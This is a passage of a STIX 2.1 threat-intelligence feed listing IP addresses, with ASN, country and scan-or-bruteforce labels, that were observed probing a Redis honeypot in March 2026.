      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--340dbe36-1893-4495-9fd2-8fd0f54f2f3a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T14:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.28']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T14:25:14.000Z",
      "valid_until": "2026-04-12T14:25:12.000Z"
    },
    {
      "created": "2026-03-11T16:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--34d348a9-f71e-4ec7-80f9-9290795f668d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T16:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.198.75.35']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T16:25:14.000Z",
      "valid_until": "2026-04-12T16:25:13.000Z"
    },
    {
      "created": "2026-03-11T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--e72de6a4-0274-48b8-bd21-07caa3addfb1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.201.88']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T17:25:13.000Z",
      "valid_until": "2026-04-12T17:25:12.000Z"
    },
    {
      "created": "2026-03-11T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--d5c3bcd7-f81e-4d29-91e1-414829f0e695",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '165.22.1.63']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T17:25:13.000Z",
      "valid_until": "2026-04-12T17:25:12.000Z"
    },
    {
      "created": "2026-03-11T18:25:22.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--decb4b56-82aa-4068-9dc5-b82f725bd731",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T18:25:22.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '137.184.197.230']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T18:25:22.000Z",
      "valid_until": "2026-04-12T18:25:21.000Z"
    },
    {
      "created": "2026-03-11T18:25:22.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--a0709b5b-3ef5-4432-a729-5b9f6f18157a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T18:25:22.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.244.169.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T18:25:22.000Z",
      "valid_until": "2026-04-12T18:25:21.000Z"
    },
    {
      "created": "2026-03-11T18:25:22.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--3338227e-095c-4a91-a1f1-2a280a692126",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T18:25:22.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.188.53.152']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T18:25:22.000Z",
      "valid_until": "2026-04-12T18:25:21.000Z"
    },
    {
      "created": "2026-03-11T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--de96fee9-a8eb-4d0e-a4d8-78f07827ae4e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '134.209.78.215']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T19:25:13.000Z",
      "valid_until": "2026-04-12T19:25:12.000Z"
    },
    {
      "created": "2026-03-11T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--0d6b46d3-ab07-469c-aee8-0ac358e1bdca",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '142.93.125.163']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T19:25:13.000Z",
      "valid_until": "2026-04-12T19:25:12.000Z"
    },
    {
      "created": "2026-03-11T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--c0b0560d-f9f3-4469-84c1-ec8b93e8902e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '68.183.142.129']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T19:25:13.000Z",
      "valid_until": "2026-04-12T19:25:12.000Z"
    },
    {
      "created": "2026-03-11T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--0ee4c896-6167-4e9d-8217-71f068b38751",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '112.74.38.239']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T20:25:13.000Z",
      "valid_until": "2026-04-12T20:25:12.000Z"
    },
    {
      "created": "2026-03-11T20:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--33dbcfaf-b556-4c44-9734-cebaa01ce931",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-11T20:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.248.133.114']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T20:25:13.000Z",
      "valid_until": "2026-04-12T20:25:12.000Z"
    },
    {
      "created": "2026-03-11T22:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--7d56687f-fcd8-49ab-9237-9dce1d59e924",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-11T22:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '198.235.24.110']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-11T22:25:13.000Z",
      "valid_until": "2026-04-12T22:25:12.000Z"
    },
    {
      "created": "2026-03-12T01:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--66697fa3-2bd4-4c89-9194-1c00c673187b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T01:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.83.173.252']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T01:25:06.000Z",
      "valid_until": "2026-04-13T01:25:05.000Z"
    },
    {
      "created": "2026-03-12T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--a4a4535e-5c46-4324-875b-d98b6205f85e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.240.223.240']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T02:25:13.000Z",
      "valid_until": "2026-04-13T02:25:12.000Z"
    },
    {
      "created": "2026-03-12T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--7b77918e-d1ad-4580-9d3a-f56f42fed41e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.130.138.41']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T02:25:13.000Z",
      "valid_until": "2026-04-13T02:25:12.000Z"
    },
    {
      "created": "2026-03-12T03:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--87b729c3-0a16-478c-ae71-20a776fe9acb",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T03:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.21']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T03:25:13.000Z",
      "valid_until": "2026-04-13T03:25:12.000Z"
    },
    {
      "created": "2026-03-12T04:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--a42f2a43-b41a-4f51-a680-5a4e08dc1cba",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T04:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '157.245.252.5']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T04:25:07.000Z",
      "valid_until": "2026-04-13T04:25:05.000Z"
    },
    {
      "created": "2026-03-12T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0",
      "id": "indicator--bbf73bfc-4cfc-406b-a88d-596f5a1f5950",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.75.176.89']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T05:25:13.000Z",
      "valid_until": "2026-04-13T05:25:12.000Z"
    },
    {
      "created": "2026-03-12T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=SG; asn=212238; asn_org=Datacamp Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--a7579195-3579-4311-8019-3eb52dc49ad6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '156.146.57.180']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T05:25:13.000Z",
      "valid_until": "2026-04-13T05:25:12.000Z"
    },
    {
      "created": "2026-03-12T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--fd737788-346d-4b15-b716-552b695a1e62",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.168.5.42']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T05:25:13.000Z",
      "valid_until": "2026-04-13T05:25:12.000Z"
    },
    {
      "created": "2026-03-12T08:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--a4c16a2b-639e-4bcb-aa07-8a26bd381e64",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T08:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '118.121.27.103']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T08:25:12.000Z",
      "valid_until": "2026-04-13T08:25:11.000Z"
    },
    {
      "created": "2026-03-12T10:25:08.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; redis_cmd_hits=0",
      "id": "indicator--7d9dba6b-cbcf-48a2-a454-785277d3d108",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T10:25:08.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.156.128.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T10:25:08.000Z",
      "valid_until": "2026-04-13T10:25:07.000Z"
    },
    {
      "created": "2026-03-12T11:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4538; asn_org=China Education and Research Network Center; redis_cmd_hits=0",
      "id": "indicator--2f838d4a-df87-42a0-9778-aeef9494660a",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T11:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '202.121.66.3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T11:25:02.000Z",
      "valid_until": "2026-04-13T11:25:01.000Z"
    },
    {
      "created": "2026-03-12T12:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--a616f47c-eaff-4044-98c9-bb8051f3c65b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T12:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '178.128.109.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T12:25:12.000Z",
      "valid_until": "2026-04-13T12:25:12.000Z"
    },
    {
      "created": "2026-03-12T12:25:12.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=9123; asn_org=Jsc timeweb; redis_cmd_hits=0",
      "id": "indicator--8d89375e-3783-4de3-9cfb-2d4b4e1f0d64",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T12:25:12.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.207.65.7']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T12:25:12.000Z",
      "valid_until": "2026-04-13T12:25:12.000Z"
    },
    {
      "created": "2026-03-12T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--53ceda40-7c60-4082-8581-52a71c25cecc",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '143.42.1.128']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T13:25:13.000Z",
      "valid_until": "2026-04-13T13:25:12.000Z"
    },
    {
      "created": "2026-03-12T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--cb5c86cc-71b1-473c-bd31-df0ccd806634",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.222.201.82']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T13:25:13.000Z",
      "valid_until": "2026-04-13T13:25:12.000Z"
    },
    {
      "created": "2026-03-12T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--f11c2c43-e7bc-4c18-b937-3309a1490a89",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '206.168.34.204']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T13:25:13.000Z",
      "valid_until": "2026-04-13T13:25:12.000Z"
    },
    {
      "created": "2026-03-12T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--690f1e5e-43cc-4f70-a188-f7843dcaf44b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.56.83.110']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T13:25:13.000Z",
      "valid_until": "2026-04-13T13:25:12.000Z"
    },
    {
      "created": "2026-03-12T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--0c3eead4-8f85-4c47-b954-d70ae6e1d0e9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.20.66']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T13:25:13.000Z",
      "valid_until": "2026-04-13T13:25:12.000Z"
    },
    {
      "created": "2026-03-12T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--f6f6bc61-8180-436f-a2bb-51c238ac850e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-12T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.20.78']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T13:25:13.000Z",
      "valid_until": "2026-04-13T13:25:12.000Z"
    },
    {
      "created": "2026-03-12T16:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=134810; asn_org=China Mobile Group JiLin communications corporation; redis_cmd_hits=0",
      "id": "indicator--cf0c0e8f-b3d2-4c37-bb81-f1ec3ee3963a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T16:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '36.135.17.52']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T16:25:13.000Z",
      "valid_until": "2026-04-13T16:25:12.000Z"
    },
    {
      "created": "2026-03-12T19:25:36.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=99; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd=\"...L..1\"R.....%....@.,....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group\"",
      "id": "indicator--8be5d4f2-2465-4a2f-9c98-ca73bc20b517",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-12T19:25:36.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.130.168.2']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-12T19:25:36.000Z",
      "valid_until": "2026-04-13T19:25:12.000Z"
    },
    {
      "created": "2026-03-14T00:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--2615f27d-d0b9-497f-89ff-257278b1c0e0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T00:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '106.15.64.156']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T00:25:06.000Z",
      "valid_until": "2026-04-15T00:25:01.000Z"
    },
    {
      "created": "2026-03-14T00:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--e0dae331-7f60-4f45-9068-781490724b0c",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T00:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.132']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T00:25:06.000Z",
      "valid_until": "2026-04-15T00:25:01.000Z"
    },
    {
      "created": "2026-03-14T00:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0",
      "id": "indicator--129eee7b-ba1b-44ff-afdd-94bc39bebe6f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-14T00:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '193.163.125.210']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T00:25:06.000Z",
      "valid_until": "2026-04-15T00:25:01.000Z"
    },
    {
      "created": "2026-03-14T00:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--47ce10db-2510-4a38-9326-174bbb7c43b8",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T00:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.153.134']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T00:25:06.000Z",
      "valid_until": "2026-04-15T00:25:01.000Z"
    },
    {
      "created": "2026-03-14T02:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--a2d3f214-d5d6-4eed-9087-9e3d11981e14",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-14T02:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '129.212.180.243']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-14T02:25:07.000Z",
      "valid_until": "2026-04-15T02:25:06.000Z"
    },
    {
      "created": "2026-03-14T02:25:07.000Z",
